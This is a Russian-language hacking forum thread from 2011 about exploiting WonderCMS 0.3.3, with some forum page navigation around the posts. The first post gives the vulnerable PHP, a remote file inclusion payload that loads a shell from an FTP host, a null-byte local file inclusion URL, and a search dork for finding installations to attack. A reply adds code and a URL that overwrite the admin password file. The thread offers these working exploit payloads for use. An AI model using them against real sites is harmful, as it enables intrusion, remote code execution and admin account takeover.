WonderCMS 0.3.3

}{оттабыч · 06.03.2011, 21:25

WonderCMS 0.3.3

http://krneky.com/en/wondercms -> разработчики.

RFI
allow_url_include on

PHP код:


			
/*...*/
$theme = $_REQUEST['theme'];
if( !$theme ) $theme = @file_get_contents("files/theme");
if( !file_exists("$theme.php") ) $theme = "default";
/*...*/
require("$theme.php");
/*...*/

Чтоб обойти file_exists() грузим на ftp, shell должен быть с названием shell.php

PoC:

Код:

http://localhost/wondercms/?theme=ftp://<user>:<password>@<host>:<port>/shell

LFI
magic_quotes_gpc off

PoC

Код:

http://localhost/wondercms/?theme=.htaccess%00

Дорк: intext:"Powered by WonderCMS"

ne3z · 07.03.2011, 18:22

Сброс пасса админа, нужно быть залогиненым. о_О

PHP код:


			
$fieldname = $_REQUEST['fieldname'];

   

   $encrypt_pass = @file_get_contents("files/password");

   if ($_COOKIE['wondercms']!=$encrypt_pass)

   {

       echo "You must login first before you can use this function!";

       exit;

   }

   

   $content = rtrim(stripslashes($_REQUEST['content']));

   // if to only allow specified tags

   if($fieldname=="title")    $content = strip_tags($content);

   else    $content = strip_tags($content,"<p><h1><h2><h3><a><img><u><i><em><strong><b><strike>");



   $content = trim($content);

   $content = nl2br($content);



   if(!$content) $content = "Please enter content...";



   $content = preg_replace ("/%u(....)/e", "conv('\\1')", $content);



   if($fieldname>0 && $fieldname<4) $fname = "attachment$fieldname";

   else $fname = $fieldname;   

   $file = fopen("files/$fname.txt", "w");

   if(!$file)

   {

       echo "<h1 style='color:red'>*** FATAL *** unable to open content_$fieldname</h1>Please make sure read/write permissions are enabled.";

       exit;

   }

   fwrite($file, $content);

   fclose($file);



   echo $content;

example: http://site/dir/edittext.php?fieldname=password%00&content=rdot

06.03.2011, 21:25	#1
}{оттабыч Banned Регистрация: 08.10.2010 Сообщений: 188 Репутация: 53	WonderCMS 0.3.3 WonderCMS 0.3.3 http://krneky.com/en/wondercms -> разработчики. RFI allow_url_include on PHP код: `/.../ $theme = $_REQUEST['theme']; if( !$theme ) $theme = @file_get_contents("files/theme"); if( !file_exists("$theme.php") ) $theme = "default"; /.../ require("$theme.php"); /.../` Чтоб обойти file_exists() грузим на ftp, shell должен быть с названием shell.php PoC: Код: http://localhost/wondercms/?theme=ftp://<user>:<password>@<host>:<port>/shell LFI magic_quotes_gpc off PoC Код: http://localhost/wondercms/?theme=.htaccess%00 Дорк: intext:"Powered by WonderCMS"

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

07.03.2011, 18:22	#2
ne3z Регистрация: 28.02.2011 Сообщений: 1 Репутация: 0	Сброс пасса админа, нужно быть залогиненым. о_О PHP код: $fieldname = $_REQUEST['fieldname']; $encrypt_pass = @file_get_contents("files/password"); if ($_COOKIE['wondercms']!=$encrypt_pass) { echo "You must login first before you can use this function!"; exit; } $content = rtrim(stripslashes($_REQUEST['content'])); // if to only allow specified tags if($fieldname=="title") $content = strip_tags($content); else $content = strip_tags($content,"<p><h1><h2><h3><a><img><u><i><em><strong><b><strike>"); $content = trim($content); $content = nl2br($content); if(!$content) $content = "Please enter content..."; $content = preg_replace ("/%u(....)/e", "conv('\\1')", $content); if($fieldname>0 && $fieldname<4) $fname = "attachment$fieldname"; else $fname = $fieldname; $file = fopen("files/$fname.txt", "w"); if(!$file) { echo "<h1 style='color:red'>* FATAL * unable to open content_$fieldname</h1>Please make sure read/write permissions are enabled."; exit; } fwrite($file, $content); fclose($file); echo $content; example: http://site/dir/edittext.php?fieldname=password%00&content=rdot